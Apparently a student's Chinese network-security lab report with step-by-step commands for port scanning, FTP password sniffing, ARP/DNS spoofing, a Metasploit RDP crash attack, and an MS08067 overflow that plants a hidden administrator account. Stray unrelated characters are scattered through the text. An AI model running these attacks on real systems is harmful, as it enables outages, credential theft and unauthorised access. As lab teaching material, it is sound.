網(wǎng)絡(luò)安全實驗報告 第一章

NMap端口掃描

NMap是用來掃描網(wǎng)絡(luò)上計算機(jī)開放的網(wǎng)絡(luò)連接端口。

  1. Nmap GUI的使用

    Target中輸入目標(biāo)IP地址,掃描方式選擇regular scan力试,點擊scan,即可得到目標(biāo)主機(jī)開放的端口。
  2. 命令行的使用
    進(jìn)行上述GUI掃描的命令是:nmap IP
    對指定端口進(jìn)行掃描的命令是:nmap -p portnumber IP
    對目標(biāo)主機(jī)進(jìn)行全連接掃描(穩(wěn)定可靠但容易被日志記錄)的命令是:nmap -sT IP
    對目標(biāo)主機(jī)進(jìn)行半開連接掃描(更隱蔽)的命令是:nmap -sS IP
    保存掃描結(jié)果的掃描命令是:nmap -oX filename IP
  3. 課后習(xí)題
    組合命令如:同時保存掃描結(jié)果并以半開連接方式掃描:nmap -sS -oX filename IP
    識別主機(jī)操作系統(tǒng)的命令是:nmap -O IP

綜合掃描X-Scan

X-Scan采用多線程方式對指定IP地址段進(jìn)行安全漏洞檢測糯笙。

  1. 設(shè)置X-Scan參數(shù)
    在菜單欄設(shè)置->掃描參數(shù)中,有以下這些選項:
  • 掃描模塊:包含服務(wù)和協(xié)議弱口令等信息的掃描
  • 并發(fā)掃描:對掃描的并發(fā)數(shù)量進(jìn)行設(shè)置
  • 掃描報告:設(shè)定掃描完成后報告生成情況
  • 其他設(shè)置:對掃描進(jìn)度的顯示等
  • 端口設(shè)置:設(shè)置想要掃描的端口撩银、檢測方式等內(nèi)容(本實驗填21给涕,即FTP
  1. 進(jìn)行掃描
    設(shè)置完成后點擊文件->開始掃描,自動生成報告额获,觀察到已破解FTP弱口令:
    在瀏覽器中輸入:ftp://192.168.1.3够庙,輸入以上用戶名和口令,成功登陸:
    證明漏洞獲取成功抄邀。
  2. 課后習(xí)題
  • 防火墻對掃描軟件有屏蔽作用耘眨,因為它可以把掃描軟件發(fā)出的數(shù)據(jù)包丟掉而不作出回應(yīng)。
  • 服務(wù)攻擊是讓目標(biāo)機(jī)器停止提供服務(wù)的攻擊境肾,不是針對某種特定網(wǎng)絡(luò)的剔难。

AWVS掃描器掃描web漏洞

AWVS可以掃描任何可通過Web瀏覽器訪問的Web站點和Web應(yīng)用程序,可通過SQL注入攻擊奥喻、跨站腳本攻擊等審核應(yīng)用程序的安全性偶宫。

  1. 基本用法
    單擊工具欄中的new scan,輸入URL:192.168.1.3:8001环鲤,一直點擊下一步直到Finish纯趋,掃描結(jié)果如下:
  2. 高級功能
    在上圖左欄中選擇tools中的site crawler,點擊start,即可進(jìn)行站點爬行吵冒。
    在上圖左欄中選擇tools中的target finder纯命,可找出web服務(wù)器。
  3. 課后習(xí)題
    AWVS的其他功能如:選擇tools中的http sniffer桦锄,可以實現(xiàn)抓包:
    經(jīng)過http_sniffer捕捉到的數(shù)據(jù)包扎附,可以直接send到http editor,使用http editor進(jìn)行編輯和重放结耀,如圖:

AppScan掃描web漏洞

AppScan通過爬行發(fā)現(xiàn)整個web應(yīng)用結(jié)構(gòu)留夜,發(fā)送修改的HTTP Request進(jìn)行攻擊,驗證是否存在安全漏洞图甜。

  1. 開啟掃描
    選擇文件->新建中的常規(guī)掃描碍粥,并選中啟動掃描配置向?qū)В琔RL填寫192.168.1.3:8001黑毅,之后一直選是直到得到掃描結(jié)果:
    點擊右上角的報告嚼摩,生成PDF格式的報告。
  2. 課后習(xí)題
    分析掃描結(jié)果:以SQL注入攻擊為例矿瘦,它是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串枕面,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。該問題存在于該站點的see.asp網(wǎng)頁的titleIDID缚去、list.asp網(wǎng)頁的PhotoerKeyWords潮秘、exif.asp網(wǎng)頁的idcontent.asp網(wǎng)頁的ID2等變量中易结。
    appscan的功能是進(jìn)行漏洞檢查枕荞,而不是進(jìn)行漏洞攻擊。

御劍web后臺敏感目錄掃描

御劍掃描工具主要用來掃描目標(biāo)站點的敏感目錄搞动。

  1. 基本使用
    在域名中輸入192.168.1.3:8001躏精,點擊開始掃描,掃描結(jié)果如下:
  2. 掃描結(jié)果分析
    http響應(yīng)為200說明該頁面可訪問鹦肿。例如雙擊index.asp即可進(jìn)入目標(biāo)站點的主頁矗烛,雙擊FCKeditor/_whatsnew.html可知道該站點的編輯器類型為FCK及其版本號。
  3. 課后習(xí)題
    敏感目錄如后臺管理頁面箩溃、cms類型以及版本等高诺,即包含站點關(guān)鍵信息的頁面。
    可在login.asp頁面看到網(wǎng)站數(shù)據(jù)庫為asp+access

FTP連接與密碼明文抓取-wireshark

Wireshark是一個網(wǎng)絡(luò)封包分析軟件碾篡,它擷取網(wǎng)絡(luò)封包虱而,并盡可能顯示出最詳細(xì)的有關(guān)資料。

  1. 抓包參數(shù)的設(shè)置
    Capture菜單中設(shè)置抓包的相關(guān)參數(shù)开泽,如interfaces選項顯示可操作性的網(wǎng)絡(luò)適配器牡拇,options選項設(shè)置如抓包模式、過濾器等參數(shù)。點擊start開始惠呼。
  2. 數(shù)據(jù)包的解析


  • 第一行為Wireshark添加的該幀的統(tǒng)計信息导俘,包括捕獲時間、編號剔蹋、幀長度旅薄、協(xié)議等。
  • 第二行為鏈路層信息泣崩,包括目的MAC地址少梁,源MAC地址,上層協(xié)議類型矫付。
  • 第三行為網(wǎng)絡(luò)層信息凯沪,此處為IP協(xié)議,包括版本买优、頭部長度妨马、總長度、標(biāo)志位等杀赢。
  • 第四行為傳輸層信息烘跺,包括源/目的端口、序列號脂崔、期望的下一個序列號等液荸。
  • 第五行為應(yīng)用層,此處為FTP協(xié)議脱篙,顯示的是響應(yīng)內(nèi)容。
  1. 建立連接
    設(shè)置完參數(shù)后點擊start按鈕開始抓包伤柄,在地址欄輸入ftp:\192.168.1.3绊困,輸入默認(rèn)賬號和密碼。
    在filter中輸入ftp過濾出數(shù)據(jù)包适刀,看到輸入的賬號和密碼:
  2. 課后習(xí)題
    DNS依賴于UDP秤朗,F(xiàn)TP依賴于TCP
    由實驗過程可知,訪問FTP需要賬戶和密碼笔喉。
    如何合理設(shè)置抓包規(guī)則:在captionoption中:
  • 抓取http報文:輸入tcp port 80取视,因為大部分Web網(wǎng)站都是工作在80端口的
  • 抓取arp報文:輸入ether proto 0x0806虱黄,這個字段的值表示是ARP報文
  • 只抓取與某主機(jī)的通信:輸入host IP

利用arp協(xié)議缺陷實現(xiàn)中間人攻擊及內(nèi)網(wǎng)DNS欺騙

ARP協(xié)議是根據(jù)IP地址獲取物理地址的一個TCP/IP協(xié)議靴患,攻擊者可以通過修改arp高速緩存來實現(xiàn)攻擊。
DNS是將域名和IP互相映射的網(wǎng)絡(luò)應(yīng)用的基礎(chǔ)設(shè)施鞋吉。DNS攻擊和ARP攻擊原理相同奄毡,但是要事先知道DNS查詢請求ID折欠。
CAIN是一個實現(xiàn)各種中間人攻擊的軟件。

  1. 利用cain進(jìn)行arp欺騙
    打開cain軟件,在configure中選擇網(wǎng)卡锐秦,再依次點擊start->sniffer->hosts->scan mac address咪奖,掃描出本網(wǎng)段除本機(jī)以外的其他機(jī)器。只保留192.168.1.3192.168.1.4酱床。
    掃描出mac地址后羊赵,在arp選項中添加這兩個地址。
    分別查看這兩臺主機(jī)的arp緩存:
    點擊arp按鈕實施poisoning:
    再去兩個主機(jī)上查看arp緩存扇谣,發(fā)現(xiàn)mac地址被改變:

2.利用cain抓取ftp密碼
192.168.1.3系統(tǒng)中昧捷,連接192.168.1.4搭建的ftp服務(wù)器,輸入賬戶名和密碼揍堕。
再切換到192.168.1.2系統(tǒng)中料身,選擇cain下方的passwords選項,點擊左側(cè)ftp衩茸,可以看到有一條anonymous芹血,說明ftp允許匿名登錄。

3. 利用cain進(jìn)行dns欺騙
首先解析正確的www.shiyanbar.com域名:nslookup -qt=A www.shiyanbar.com 192.168.1.4

切換到192.168.1.2中楞慈,點擊arp,選擇arp-dns幔烛,點擊加號,將解析ip改為1.1.1.1囊蓝。
重新使用192.168.1.3查詢域名IP:
4. 課后習(xí)題
如何防范arp中間人攻擊:

  • 在主機(jī)綁定網(wǎng)關(guān)MAC與IP地址為靜態(tài)(默認(rèn)為動態(tài))饿悬,命令:arp -s IP MAC
  • 在網(wǎng)關(guān)綁定主機(jī)MAC與IP地址
  • 使用ARP防火墻

msf利用遠(yuǎn)程桌面協(xié)議RDP拒絕訪問漏洞

RDP(遠(yuǎn)程桌面協(xié)議)是一個讓客戶端連上服務(wù)器的協(xié)議。windows在處理某些報文時存在錯誤聚霜,會造成服務(wù)停止響應(yīng)狡恬。

1.攻擊步驟
在linux終端輸入nmap -sS -Pn -A 192.168.1.3掃描主機(jī),發(fā)現(xiàn)端口3389打開蝎宇。
輸入msfconsole命令弟劲,再輸入search ms12_020,查找遠(yuǎn)程桌面相關(guān)參數(shù)姥芥。


輸入命令use auxiliary/dos/windows/rdp/ms12_020_maxchannelids來定義exploits參數(shù)兔乞。輸入命令show options,查看需要配置的參數(shù):

設(shè)置遠(yuǎn)程主機(jī)IP:set RHOST 192.168.1.3
輸入命令exploit進(jìn)行攻擊凉唐。
目標(biāo)主機(jī)藍(lán)屏重啟庸追,說明攻擊成功。

  1. 課后習(xí)題
    如何啟動msf圖像界面:輸入命令msfgui

MS08067利用方法

利用MS08067遠(yuǎn)程溢出工具發(fā)送特殊構(gòu)造的數(shù)據(jù)包台囱,使目標(biāo)主機(jī)產(chǎn)生溢出淡溯,然后執(zhí)行shellcode代碼,打開目標(biāo)主機(jī)端口簿训,使用telnel鏈接目標(biāo)端口血筑,獲得系統(tǒng)權(quán)限绘沉。

  1. 運(yùn)行MS08067遠(yuǎn)程溢出軟件
    在命令行中運(yùn)行MS08067.exe:MS08067.exe 192.168.1.3
  2. 鏈接遠(yuǎn)程主機(jī)并添加用戶
    輸入命令telnet 192.168.1.3 4444連接目標(biāo)主機(jī)。
    輸入命令net user aaa 123456 /add在目標(biāo)主機(jī)上添加賬戶豺总。
    輸入命令net localgroup administrators aaa /add车伞,把a(bǔ)aa用戶添加到管理組。
    輸入命令net user aaa驗證aaa是否添加成功喻喳。
    打開mstsc另玖,輸入賬號和密碼,成功登陸:
  3. 課后習(xí)題
    為什么telnet 4444端口:因為MS08067.exe進(jìn)行緩沖區(qū)溢出的是4444端口表伦。

分析討論

本章實驗實現(xiàn)的功能是:掃描(端口掃描谦去、綜合掃描、web漏洞掃描蹦哼、后臺敏感目錄掃描)鳄哭、網(wǎng)絡(luò)封包分析、欺騙攻擊(arp欺騙纲熏、DNS欺騙)妆丘、攻擊(Dos攻擊、遠(yuǎn)程溢出攻擊)局劲。
總結(jié)起來勺拣,最常見的網(wǎng)絡(luò)上被利用的漏洞有:

  • Cookie中毒--身份偽裝:通過處理存放在瀏覽器cookie中的信息,黑客偽裝成合法的用戶然后就可以存取用戶的信息鱼填。許多Web應(yīng)用程序使用客戶機(jī)上的cookie來保存信息(用戶身份药有、時間戳等等)。由于cookie通常都沒有加密苹丸,黑客可以對它們進(jìn)行修改愤惰,這樣就可以通過這些"中了毒的cookie"來欺騙應(yīng)用程序。心存惡意的用戶可以訪問他人的賬戶然后象真正用戶那樣行事赘理。如1.7中的arp和dns欺騙宦言。
  • 緩沖區(qū)溢出--業(yè)務(wù)終止:通過使用某種形式的數(shù)據(jù)流,用過量的信息使服務(wù)器超載感憾,黑客常常能夠使服務(wù)器崩潰從而關(guān)閉網(wǎng)站。如1.9節(jié)中的遠(yuǎn)程溢出攻擊令花。
  • 篡改參數(shù)--欺詐:這種技術(shù)改變網(wǎng)站URL的參數(shù)阻桅。很多web應(yīng)用程序無法確定嵌入在超鏈接中CGI參數(shù)的正確性。比如說兼都,允許信用卡使用500嫂沉,000元這樣大額的限制,跳過網(wǎng)站的登陸界面以及允許對取消后的訂單和客戶信息進(jìn)行訪問扮碧。
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末趟章,一起剝皮案震驚了整個濱河市杏糙,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌蚓土,老刑警劉巖宏侍,帶你破解...
    沈念sama閱讀 219,110評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異蜀漆,居然都是意外死亡谅河,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,443評論 3 395
  • 文/潘曉璐 我一進(jìn)店門确丢,熙熙樓的掌柜王于貴愁眉苦臉地迎上來绷耍,“玉大人,你說我怎么就攤上這事鲜侥」邮迹” “怎么了?”我有些...
    開封第一講書人閱讀 165,474評論 0 356
  • 文/不壞的土叔 我叫張陵描函,是天一觀的道長崎苗。 經(jīng)常有香客問我,道長赘阀,這世上最難降的妖魔是什么益缠? 我笑而不...
    開封第一講書人閱讀 58,881評論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮基公,結(jié)果婚禮上幅慌,老公的妹妹穿的比我還像新娘。我一直安慰自己轰豆,他們只是感情好胰伍,可當(dāng)我...
    茶點故事閱讀 67,902評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著酸休,像睡著了一般骂租。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上斑司,一...
    開封第一講書人閱讀 51,698評論 1 305
  • 那天渗饮,我揣著相機(jī)與錄音,去河邊找鬼宿刮。 笑死互站,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的僵缺。 我是一名探鬼主播胡桃,決...
    沈念sama閱讀 40,418評論 3 419
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼磕潮!你這毒婦竟也來了翠胰?” 一聲冷哼從身側(cè)響起容贝,我...
    開封第一講書人閱讀 39,332評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎之景,沒想到半個月后斤富,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,796評論 1 316
  • 正文 獨居荒郊野嶺守林人離奇死亡闺兢,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,968評論 3 337
  • 正文 我和宋清朗相戀三年茂缚,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片屋谭。...
    茶點故事閱讀 40,110評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡脚囊,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出桐磁,到底是詐尸還是另有隱情悔耘,我是刑警寧澤,帶...
    沈念sama閱讀 35,792評論 5 346
  • 正文 年R本政府宣布我擂,位于F島的核電站衬以,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏校摩。R本人自食惡果不足惜看峻,卻給世界環(huán)境...
    茶點故事閱讀 41,455評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望衙吩。 院中可真熱鬧互妓,春花似錦、人聲如沸坤塞。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,003評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽摹芙。三九已至灼狰,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間浮禾,已是汗流浹背交胚。 一陣腳步聲響...
    開封第一講書人閱讀 33,130評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留盈电,地道東北人蝴簇。 一個月前我還...
    沈念sama閱讀 48,348評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像挣轨,于是被迫代替她去往敵國和親军熏。 傳聞我的和親對象是個殘疾皇子轩猩,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,047評論 2 355

推薦閱讀更多精彩內(nèi)容

  • Metasploit基本介紹與配置 Metasploit作為一個非常全面的滲透工具卷扮,用來收集信息非常好用荡澎,信息收集...
    yingtaomj閱讀 2,752評論 0 2
  • nmap使用指南(終極版) 原創(chuàng)2017-09-09hl0rey信安之路 一、目標(biāo)指定 1.CIDR標(biāo)志位 192...
    用電熱毯烤豬閱讀 11,999評論 1 49
  • Nmap掃描原理與用法 1Nmap介紹 Nmap掃描原理與用法PDF:下載地址 Nmap是一款開源免費(fèi)的網(wǎng)絡(luò)發(fā)現(xiàn)(...
    y0ungta1a閱讀 5,387評論 0 50
  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD)晤锹,是在OS / 2 摩幔, Windows...
    青冥之上閱讀 2,393評論 0 24
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,202評論 0 11